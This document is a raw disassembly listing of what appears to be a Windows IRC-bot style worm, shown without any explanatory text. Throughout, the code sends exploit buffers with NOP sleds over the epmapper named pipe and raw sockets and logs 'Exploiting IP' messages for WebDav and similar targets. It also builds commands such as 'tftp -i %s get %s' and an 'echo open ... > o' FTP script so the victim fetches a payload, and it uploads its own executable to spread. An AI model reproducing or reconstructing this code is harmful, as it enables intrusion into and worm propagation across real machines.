loc_4141E6: ; CODE XREF: sub_41411D+BD�j
cmp eax, 5
jz short loc_4141F4
cmp eax, edi
jz short loc_4141F4
xor eax, eax
inc eax
jmp short loc_4141F6
; ---------------------------------------------------------------------------
loc_4141F4: ; CODE XREF: sub_41411D+CC�j
; sub_41411D+D0�j
xor eax, eax
loc_4141F6: ; CODE XREF: sub_41411D+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_41411D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141FB proc near ; CODE XREF: .text:0041459A�p
; .text:0041467A�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_42BAA8 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_124], bl
lea edi, [ebp+var_123]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+var_124]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_4185C0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_4185C0
add esp, 10h
jmp short loc_414295
; ---------------------------------------------------------------------------
loc_41428A: ; CODE XREF: sub_4141FB+AB�j
push 7D0h
call dword_422000 ; Sleep
loc_414295: ; CODE XREF: sub_4141FB+8D�j
push ebx
lea eax, [ebp+var_354]
push ebx
push eax
call dword_43A330
test eax, eax
jnz short loc_41428A
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_4141FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142AE proc near ; CODE XREF: .text:004145C6�p
; .text:00414701�p
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1FE4 = dword ptr -1FE4h
var_1FD8 = byte ptr -1FD8h
var_1F31 = byte ptr -1F31h
var_1008 = byte ptr -1008h
var_1000 = dword ptr -1000h
var_FF8 = dword ptr -0FF8h
var_F88 = dword ptr -0F88h
var_F84 = dword ptr -0F84h
var_F54 = dword ptr -0F54h
var_F50 = dword ptr -0F50h
var_F38 = dword ptr -0F38h
var_E7C = dword ptr -0E7Ch
var_CA8 = dword ptr -0CA8h
var_CA0 = dword ptr -0CA0h
var_C98 = byte ptr -0C98h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3008h
call sub_416B20
push ebx
push offset byte_42FD48
push [ebp+arg_0]
mov [ebp+var_8], 0A7h
call sub_408852
pop ecx
push eax
lea eax, [ebp+var_3008]
push 1000h
push eax
call sub_412078
mov ebx, eax
add esp, 10h
test ebx, ebx
mov [ebp+var_4], ebx
jz loc_41451D
push esi
push edi
push 0Ch
pop ecx
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
lea edi, [ebp+var_2008]
rep movsd
push 29h
pop ecx
mov eax, 90909090h
lea edi, [ebp+var_1FD8]
rep stosd
stosw
stosb
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_3008]
lea edi, [ebp+var_1F31]
rep movsd
mov ecx, eax
add ebx, 0D7h
jmp short loc_414388
; ---------------------------------------------------------------------------
loc_414337: ; CODE XREF: sub_4142AE+EA�j
mov ebx, [ebp+var_8]
inc ebx
push 0Ch
pop ecx
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
lea edi, [ebp+var_2008]
rep movsd
mov ecx, ebx
mov edx, ecx
shr ecx, 2
mov eax, 90909090h
lea edi, [ebp+var_1FD8]
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_4]
mov ecx, eax
mov edx, ecx
lea edi, [ebp+ebx+var_1FD8]
shr ecx, 2
lea esi, [ebp+var_3008]
mov [ebp+var_8], ebx
rep movsd
mov ecx, edx
lea ebx, [ebx+eax+30h]
loc_414388: ; CODE XREF: sub_4142AE+87�j
and ecx, 3
mov eax, ebx
push 10h
rep movsb
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_414337
cmp [ebp+arg_C4], 0
jz short loc_4143BC
cmp [ebp+arg_C0], 3
jz short loc_4143B5
cmp [ebp+arg_C0], 0
jnz short loc_4143CA
loc_4143B5: ; CODE XREF: sub_4142AE+FC�j
mov eax, dword_4308DC
jmp short loc_4143CF
; ---------------------------------------------------------------------------
loc_4143BC: ; CODE XREF: sub_4142AE+F3�j
cmp [ebp+arg_C0], 3
mov eax, dword_4308DC
jz short loc_4143CF
loc_4143CA: ; CODE XREF: sub_4142AE+105�j
mov eax, dword_4308D8
loc_4143CF: ; CODE XREF: sub_4142AE+10C�j
; sub_4142AE+11A�j
mov [ebp+var_1FE4], eax
mov ecx, 0D8h
mov esi, offset dword_430410
lea edi, [ebp+var_1008]
rep movsd
mov esi, offset dword_430774
lea edi, [ebp+var_CA8]
movsd
movsd
movsd
movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_2008]
lea edi, [ebp+var_C98]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Fh
pop ecx
lea eax, [ebx+370h]
lea edi, [ebp+eax+var_1008]
add eax, 3Ch
mov esi, offset off_430788
rep movsd
lea edi, [ebp+eax+var_1008]
push 0Ch
pop ecx
mov esi, offset dword_4307C8
rep movsd
lea esi, [eax+30h]
mov eax, ebx
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA8], eax
add [ebp+var_CA0], eax
mov eax, [ebp+var_1000]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_1000], eax
mov eax, [ebp+var_FF8]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_FF8], eax
mov eax, [ebp+var_F88]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F88], eax
mov eax, [ebp+var_F84]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F54]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F54], eax
mov eax, [ebp+var_F50]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F38]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F38], eax
mov eax, [ebp+var_E7C]
lea eax, [eax+ebx-0Ch]
lea edi, [esi+1]
push edi
mov [ebp+var_4], esi
mov [ebp+var_E7C], eax
call sub_416DAF
pop ecx
mov ecx, edi
mov ebx, ecx
mov edx, eax
shr ecx, 2
xor eax, eax
mov edi, edx
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
mov ecx, esi
lea esi, [ebp+var_1008]
mov edi, edx
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+arg_BC]
and ecx, 3
rep movsb
mov ecx, [ebp+var_4]
pop edi
mov [eax], ecx
mov eax, edx
pop esi
loc_41451D: ; CODE XREF: sub_4142AE+3F�j
pop ebx
leave
retn
sub_4142AE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1338h
call sub_416B20
cmp dword ptr [ebp+0A8h], 1BDh
push ebx
push esi
push edi
jnz loc_41468E
lea eax, [ebp-34h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_41411D
test eax, eax
pop ecx
pop ecx
jz loc_414798
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-338h]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_416905
add esp, 0Ch
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
lea eax, [ebp-338h]
push eax
call dword_422034 ; CreateFileA
mov [ebp-4], eax
cmp eax, 0FFFFFFFFh
lea eax, [ebp+0Ch]
jnz short loc_4145A5
loc_414599: ; CODE XREF: .text:00414646�j
push eax
call sub_4141FB
pop ecx
jmp loc_414798
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: .text:00414597�j
push 2
push eax
call sub_403FEB
pop ecx
pop ecx
push 1
push eax
lea eax, [ebp-10h]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_4142AE
add esp, 0C8h
cmp eax, ebx
mov [ebp-8], eax
jz short loc_41463A
push 186A0h
call sub_416DAF
pop ecx
mov esi, eax
push ebx
xor eax, eax
mov ecx, 61A8h
mov edi, esi
rep stosd
lea eax, [ebp-0Ch]
push eax
mov edi, 2710h
push edi
push esi
push 48h
push offset dword_4303C0
push dword ptr [ebp-4]
call dword_422134 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_41462A
push ebx
lea eax, [ebp-14h]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call dword_422030 ; WriteFile
test eax, eax
jnz short loc_41464B
loc_41462A: ; CODE XREF: .text:00414610�j
push esi
call sub_416C97
push dword ptr [ebp-8]
call sub_416C97
pop ecx
pop ecx
loc_41463A: ; CODE XREF: .text:004145D6�j
push dword ptr [ebp-4]
call dword_42202C ; CloseHandle
lea eax, [ebp+0Ch]
jmp loc_414599
; ---------------------------------------------------------------------------
loc_41464B: ; CODE XREF: .text:00414628�j
push ebx
lea eax, [ebp-0Ch]
push eax
push edi
push esi
push dword ptr [ebp-4]
call dword_42208C ; ReadFile
push dword ptr [ebp-8]
mov edi, eax
call sub_416C97
push esi
call sub_416C97
pop ecx
pop ecx
push dword ptr [ebp-4]
call dword_42202C ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_4141FB
cmp edi, 1
pop ecx
jnz loc_4147AC
jmp loc_414798
; ---------------------------------------------------------------------------
loc_41468E: ; CODE XREF: .text:0041453A�j
lea eax, [ebp+0Ch]
push 1
push eax
call sub_403FEB
mov esi, eax
cmp esi, 1
pop ecx
pop ecx
jz loc_414798
xor ebx, ebx
push ebx
push 1
push 2
call dword_43A39C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_414798
push dword ptr [ebp+0A8h]
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-24h], 2
call dword_43A4F4 ; ntohs
mov [ebp-22h], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A414 ; inet_addr
push ebx
push esi
mov [ebp-20h], eax
lea eax, [ebp-0Ch]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_4142AE
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp-8], esi
jnz short loc_41471A
push dword ptr [ebp-4]
jmp short loc_414792
; ---------------------------------------------------------------------------
loc_41471A: ; CODE XREF: .text:00414713�j
mov edi, [ebp-4]
push 10h
lea eax, [ebp-24h]
push eax
push edi
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_414732
loc_41472F: ; CODE XREF: .text:00414744�j
push esi
jmp short loc_41478B
; ---------------------------------------------------------------------------
loc_414732: ; CODE XREF: .text:0041472D�j
push ebx
push 48h
push offset dword_4303C0
push edi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41472F
push ebx
mov esi, 1000h
push esi
lea eax, [ebp-1338h]
push eax
push edi
call dword_43A304 ; recv
push ebx
push dword ptr [ebp-0Ch]
push dword ptr [ebp-8]
push edi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_414773
push dword ptr [ebp-8]
jmp short loc_41478B
; ---------------------------------------------------------------------------
loc_414773: ; CODE XREF: .text:0041476C�j
push ebx
push esi
lea eax, [ebp-1338h]
push eax
push edi
call dword_43A304 ; recv
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_41479F
loc_41478B: ; CODE XREF: .text:00414730�j
; .text:00414771�j
call sub_416C97
pop ecx
push edi
loc_414792: ; CODE XREF: .text:00414718�j
call dword_43A4B0 ; closesocket
loc_414798: ; CODE XREF: .text:00414551�j
; .text:004145A0�j ...
xor eax, eax
jmp loc_414857
; ---------------------------------------------------------------------------
loc_41479F: ; CODE XREF: .text:00414789�j
call sub_416C97
pop ecx
push edi
call dword_43A4B0 ; closesocket
loc_4147AC: ; CODE XREF: .text:00414683�j
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-234h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_416905
add esp, 0Ch
xor esi, esi
loc_4147C6: ; CODE XREF: .text:004147E6�j
lea eax, [ebp-234h]
push eax
call sub_401FAD
test eax, eax
pop ecx
jnz short loc_4147EA
push 1388h
call dword_422000 ; Sleep
inc esi
cmp esi, 6
jl short loc_4147C6
jmp short loc_414854
; ---------------------------------------------------------------------------
loc_4147EA: ; CODE XREF: .text:004147D5�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
lea eax, [ebp-234h]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call sub_416905
add esp, 10h
cmp [ebp+0BCh], ebx
jnz short loc_414836
push ebx
push dword ptr [ebp+0B8h]
lea eax, [ebp-234h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405D20
add esp, 14h
loc_414836: ; CODE XREF: .text:00414817�j
lea eax, [ebp-234h]
push eax
call sub_401ECD
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
pop ecx
loc_414854: ; CODE XREF: .text:004147E8�j
xor eax, eax
inc eax
loc_414857: ; CODE XREF: .text:0041479A�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 4210h
call sub_416B20
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push 1
push eax
call sub_403FEB
test eax, eax
pop ecx
pop ecx
jz loc_4149D2
cmp eax, 1
jz loc_4149D2
push 0
push 1
push 2
call dword_43A39C ; socket
mov ebx, eax
xor eax, eax
cmp ebx, 0FFFFFFFFh
jz loc_4149D4
push dword ptr [ebp+0A8h]
lea edi, [ebp-10h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-10h], 2
call dword_43A4F4 ; ntohs
mov [ebp-0Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A414 ; inet_addr
push offset byte_42FD48
push dword ptr [ebp+8]
mov [ebp-0Ch], eax
call sub_408852
pop ecx
push eax
mov esi, 1000h
lea eax, [ebp-2210h]
push esi
push eax
call sub_412078
add esp, 10h
test eax, eax
jz loc_4149D2
push 122h
push offset loc_4308E0
lea eax, [ebp-4210h]
push esi
push eax
call sub_411F71
mov eax, 12Eh
add [ebp-0EB0h], eax
add [ebp-0EA8h], eax
mov eax, 250h
add [ebp-1208h], eax
add [ebp-1200h], eax
add [ebp-1190h], eax
add [ebp-118Ch], eax
add [ebp-115Ch], eax
add [ebp-1158h], eax
add [ebp-1140h], eax
add [ebp-1084h], eax
add esp, 10h
push 10h
lea eax, [ebp-10h]
push eax
push ebx
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41496E
loc_41496B: ; CODE XREF: .text:00414982�j
; .text:0041499B�j ...
push ebx
jmp short loc_4149CC
; ---------------------------------------------------------------------------
loc_41496E: ; CODE XREF: .text:00414969�j
xor edi, edi
push edi
push 48h
push offset dword_430A08
push ebx
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41496B
push edi
push esi
lea eax, [ebp-3210h]
push eax
push ebx
call dword_43A304 ; recv
cmp byte ptr [ebp-320Eh], 0Ch
jnz short loc_41496B
push edi
push edi
lea eax, [ebp-1210h]
push eax
push ebx
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41496B
push edi
push esi
lea eax, [ebp-3210h]
push eax
push ebx
call dword_43A304 ; recv
cmp byte ptr [ebp-320Eh], 3
push ebx
jnz short loc_4149D9
loc_4149CC: ; CODE XREF: .text:0041496C�j
call dword_43A4B0 ; closesocket
loc_4149D2: ; CODE XREF: .text:0041487B�j
; .text:00414884�j ...
xor eax, eax
loc_4149D4: ; CODE XREF: .text:0041489D�j
; .text:00414A8A�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4149D9: ; CODE XREF: .text:004149CA�j
call dword_43A4B0 ; closesocket
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-210h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_416905
add esp, 0Ch
xor esi, esi
loc_4149F9: ; CODE XREF: .text:00414A19�j
lea eax, [ebp-210h]
push eax
call sub_401FAD
test eax, eax
pop ecx
jnz short loc_414A1D
push 1388h
call dword_422000 ; Sleep
inc esi
cmp esi, 6
jl short loc_4149F9
jmp short loc_414A87
; ---------------------------------------------------------------------------
loc_414A1D: ; CODE XREF: .text:00414A08�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
lea eax, [ebp-210h]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call sub_416905
add esp, 10h
cmp [ebp+0BCh], edi
jnz short loc_414A69
push edi
push dword ptr [ebp+0B8h]
lea eax, [ebp-210h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405D20
add esp, 14h
loc_414A69: ; CODE XREF: .text:00414A4A�j
lea eax, [ebp-210h]
push eax
call sub_401ECD
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
pop ecx
loc_414A87: ; CODE XREF: .text:00414A1B�j
xor eax, eax
inc eax
jmp loc_4149D4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 3D4h
and dword ptr [ebp-10h], 0
push ebx
push esi
push edi
mov esi, offset dword_42BB90
lea edi, [ebp-24h]
movsd
movsd
movsd
movsd
push 15Bh
movsw
mov dword ptr [ebp-44h], 6741A1CDh
mov dword ptr [ebp-40h], 6741A199h
mov dword ptr [ebp-3Ch], 6741A426h
mov dword ptr [ebp-38h], 67419E1Dh
mov dword ptr [ebp-34h], 67419CE8h
mov dword ptr [ebp-30h], 0FFB7DE9h
mov dword ptr [ebp-2Ch], 0FFB832Fh
call sub_416DAF
pop ecx
mov edi, eax
mov [ebp-4], edi
push 56h
xor eax, eax
pop ecx
rep stosd
stosw
stosb
mov ecx, [ebp-4]
mov edi, ecx
lea esi, [ebp-24h]
movsd
movsd
movsd
movsd
add ecx, 11h
movsw
mov edi, ecx
mov [ebp-28h], ecx
dec edi
loc_414B0F: ; CODE XREF: .text:00414B15�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_414B0F
mov esi, offset loc_42BB8C
movsw
movsb
mov edi, ecx
dec edi
loc_414B22: ; CODE XREF: .text:00414B28�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_414B22
mov esi, offset aNilsisgay ; "NILSISGAY!!"
movsd
push 6
movsd
push 1
push 2
movsd
call dword_43A39C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_414D69
and dword ptr [ebp-8], 0
lea esi, [ebp-44h]
mov [ebp-0Ch], esi
loc_414B53: ; CODE XREF: .text:00414CF7�j
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43A414 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-20h], eax
call dword_43A4F4 ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz loc_414CE3
mov edi, [ebp-28h]
not dword ptr [esi]
push 4
push esi
push edi
call sub_4167D0
mov eax, offset loc_42E370
add esp, 0Ch
mov ecx, eax
loc_414BAD: ; CODE XREF: .text:00414BB2�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_414BAD
sub eax, ecx
mov esi, ecx
dec edi
loc_414BB9: ; CODE XREF: .text:00414BBF�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_414BB9
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-4]
rep movsb
lea ecx, [eax+1]
loc_414BD5: ; CODE XREF: .text:00414BDA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_414BD5
push 0
sub eax, ecx
push eax
lea eax, [ebp-4]
push eax
push ebx
call dword_43A438 ; send
test eax, eax
jz loc_414CE0
mov esi, dword_422000
push 3E8h
call esi ; Sleep
push ebx
call dword_43A4B0 ; closesocket
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43A414 ; inet_addr
push 7BDh
mov [ebp-20h], eax
call dword_43A4F4 ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_43A34C ; connect
test eax, eax
jz loc_414CE0
mov eax, offset byte_42FD48
push eax
push eax
push dword ptr [ebp+8]
call sub_408852
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
mov edi, 190h
lea eax, [ebp-1D4h]
push edi
push eax
call sub_416B5D
add esp, 18h
push dword_439EE4
push dword ptr [ebp+8]
call sub_408852
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1D4h]
push edi
push eax
call sub_416B5D
add esp, 14h
push 0
add edi, 70h
push edi
lea eax, [ebp-3D4h]
push eax
push dword ptr [ebp+8]
call dword_43A304 ; recv
test eax, eax
jle short loc_414CE0
push 1F4h
call esi ; Sleep
lea eax, [ebp-1D4h]
lea edx, [eax+1]
loc_414CC2: ; CODE XREF: .text:00414CC7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414CC2
push 0
sub eax, edx
push eax
lea eax, [ebp-1D4h]
push eax
push ebx
call dword_43A438 ; send
test eax, eax
jg short loc_414CFF
loc_414CE0: ; CODE XREF: .text:00414BEE�j
; .text:00414C42�j ...
mov esi, [ebp-0Ch]
loc_414CE3: ; CODE XREF: .text:00414B8F�j
push ebx
call dword_43A4B0 ; closesocket
inc dword ptr [ebp-8]
add esi, 4
cmp dword ptr [ebp-8], 7
mov [ebp-0Ch], esi
jb loc_414B53
jmp short loc_414D69
; ---------------------------------------------------------------------------
loc_414CFF: ; CODE XREF: .text:00414CDE�j
push ebx
call dword_43A4B0 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-3D4h]
push edi
push eax
mov dword ptr [ebp-10h], 1
call sub_416B5D
add esp, 14h
cmp dword ptr [ebp+0BCh], 0
jnz short loc_414D5C
push 0
push dword ptr [ebp+0B8h]
lea eax, [ebp-3D4h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405D20
add esp, 14h
loc_414D5C: ; CODE XREF: .text:00414D3C�j
lea eax, [ebp-3D4h]
push eax
call sub_401ECD
pop ecx
loc_414D69: ; CODE XREF: .text:00414B43�j
; .text:00414CFD�j
mov eax, [ebp-10h]
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414D71 proc near ; CODE XREF: .text:00414EB7�p
; .text:00414F57�p ...
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
lea eax, [ebp+var_8]
push eax
push esi
push esi
lea eax, [ebp+var_10C]
push eax
push esi
mov [ebp+var_8], 1Eh
mov [ebp+var_4], esi
mov [ebp+var_108], ebx
mov [ebp+var_10C], 1
call dword_43A448 ; select
test eax, eax
jg short loc_414DBF
push ebx
call dword_43A4B0 ; closesocket
loc_414DBA: ; CODE XREF: sub_414D71+71�j
or eax, 0FFFFFFFFh
jmp short loc_414DF6
; ---------------------------------------------------------------------------
loc_414DBF: ; CODE XREF: sub_414D71+40�j
push edi
push esi
mov edx, offset dword_480D58
push 400h
push edx
xor eax, eax
mov edi, edx
mov ecx, 100h
push ebx
rep stosd
call dword_43A304 ; recv
cmp eax, 1
pop edi
jl short loc_414DBA
mov ecx, off_4310BC
xor eax, eax
cmp dword ptr [ecx], 52525245h
setnz al
dec eax
loc_414DF6: ; CODE XREF: sub_414D71+4C�j
pop esi
pop ebx
leave
retn
sub_414D71 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 740h
push ebx
xor eax, eax
push esi
push edi
lea edi, [ebp-2Ch]
stosd
stosd
stosd
stosw
stosb
xor eax, eax
lea edi, [ebp-18h]
stosd
xor ebx, ebx
mov [ebp-1Ch], ebx
stosb
call dword_42201C ; GetTickCount
push eax
call sub_41698D
pop ecx
xor esi, esi
loc_414E2C: ; CODE XREF: .text:00414E42�j
call sub_41699A
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [ebp+esi-18h], dl
inc esi
cmp esi, 4
jl short loc_414E2C
lea eax, [ebp-18h]
push eax
lea eax, [ebp-2Ch]
push offset dword_42BBA4
push eax
mov [ebp+esi-17h], bl
call sub_416905
add esp, 0Ch
push ebx
push 1
push 2
call dword_43A39C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp-4], esi
jz loc_41504F
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-3Ch], 2
call dword_43A414 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-38h], eax
call dword_43A4F4 ; ntohs
mov [ebp-3Ah], ax
push 10h
lea eax, [ebp-3Ch]
push eax
push esi
call dword_43A34C ; connect
lea eax, [ebp-1Ch]
push eax
push 8004667Eh
push esi
call dword_43A334 ; ioctlsocket
push esi
call sub_414D71
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_415046
xor eax, eax
mov esi, offset dword_480D58
mov ecx, 100h
mov edi, esi
rep stosd
push 104h
lea eax, [ebp-140h]
push eax
push ebx
call dword_42200C ; GetModuleFileNameA
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp-140h]
push eax
call dword_422034 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp-10h], eax
jz loc_415046
push ebx
push eax
call dword_422094 ; GetFileSize
mov ecx, off_4310BC
mov dword ptr [ecx], 46445055h
mov ecx, off_4310BC
mov [ecx+4], eax
mov edi, off_4310BC
mov [ebp-8], eax
lea eax, [ebp-2Ch]
add edi, 8
loc_414F3A: ; CODE XREF: .text:00414F42�j
mov cl, [eax]
inc eax
mov [edi], cl
inc edi
cmp cl, bl
jnz short loc_414F3A
push ebx
push 400h
push esi
push dword ptr [ebp-4]
call dword_43A438 ; send
push dword ptr [ebp-4]
call sub_414D71
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_415046
cmp [ebp-8], ebx
jz short loc_414FE7
loc_414F6B: ; CODE XREF: .text:00414FE5�j
xor eax, eax
cmp dword ptr [ebp-8], 400h
mov ecx, 100h
lea edi, [ebp-740h]
mov dword ptr [ebp-0Ch], 400h
rep stosd
jnb short loc_414F90
mov eax, [ebp-8]
mov [ebp-0Ch], eax
loc_414F90: ; CODE XREF: .text:00414F88�j
mov eax, [ebp-8]
push 2
push ebx
neg eax
push eax
push dword ptr [ebp-10h]
call dword_422090 ; SetFilePointer
push ebx
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-0Ch]
lea eax, [ebp-740h]
push eax
push dword ptr [ebp-10h]
call dword_42208C ; ReadFile
push ebx
push dword ptr [ebp-0Ch]
lea eax, [ebp-740h]
push eax
push dword ptr [ebp-4]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_414FE2
call dword_43A45C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_414FE7
xor eax, eax
loc_414FE2: ; CODE XREF: .text:00414FD1�j
sub [ebp-8], eax
jnz short loc_414F6B
loc_414FE7: ; CODE XREF: .text:00414F69�j
; .text:00414FDE�j
push dword ptr [ebp-4]
call sub_414D71
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_415046
push dword ptr [ebp-10h]
call dword_42202C ; CloseHandle
xor eax, eax
mov ecx, 100h
mov edi, esi
rep stosd
mov eax, off_4310BC
mov dword ptr [eax], 464E5552h
lea eax, [ebp-2Ch]
push eax
mov eax, off_4310BC
add eax, 4
push eax
call sub_416905
pop ecx
pop ecx
push ebx
push 400h
push esi
push dword ptr [ebp-4]
call dword_43A438 ; send
push dword ptr [ebp-4]
call sub_414D71
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_415056
loc_415046: ; CODE XREF: .text:00414EC0�j
; .text:00414F08�j ...
push dword ptr [ebp-4]
call dword_43A4B0 ; closesocket
loc_41504F: ; CODE XREF: .text:00414E70�j
xor eax, eax
jmp loc_4150F4
